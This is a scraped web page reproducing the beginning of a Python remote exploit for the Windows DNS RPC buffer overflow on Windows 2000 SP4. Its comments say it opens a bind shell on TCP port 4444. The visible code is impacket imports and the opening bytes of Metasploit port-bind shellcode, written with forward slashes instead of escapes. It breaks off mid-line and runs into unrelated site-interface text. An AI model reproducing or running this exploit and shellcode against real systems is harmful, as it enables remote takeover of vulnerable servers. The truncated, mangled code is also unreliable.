MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)

  1. #!/usr/bin/python
  2. # Remote exploit for the 0day Windows DNS RPC service vulnerability as
  3. # described in [url]http://www.securityfocus.com/bid/23470/info.[/url] Tested on
  4. # Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
  5. # and then connects to it.
  6. #
  7. # Cheers to metasploit for the first exploit.
  8. # Written for educational and testing purposes.
  9. # Author shall bear no responsibility for any damage caused by using this code
  10. # Winny Thomas :-)
  11. import os
  12. import sys
  13. import time
  14. from impacket.dcerpc import transport, dcerpc, epm
  15. from impacket import uuid
  16. #Portbind shellcode from metasploit; Binds port to TCP port 4444
  17. shellcode = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
  18. shellcode += "/x29/xc9/x83/xe9/xb0/xe8/xff/xff/xff/xff/xc0/x5e/x81/x76/x0e/xe9"
  19. shellcode += "/x4a/xb6/xa9/x83/xee/xfc/xe2/xf4/x15/x20/x5d/xe4/x01/xb3/x49/x56"
  20. shellcode += 
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值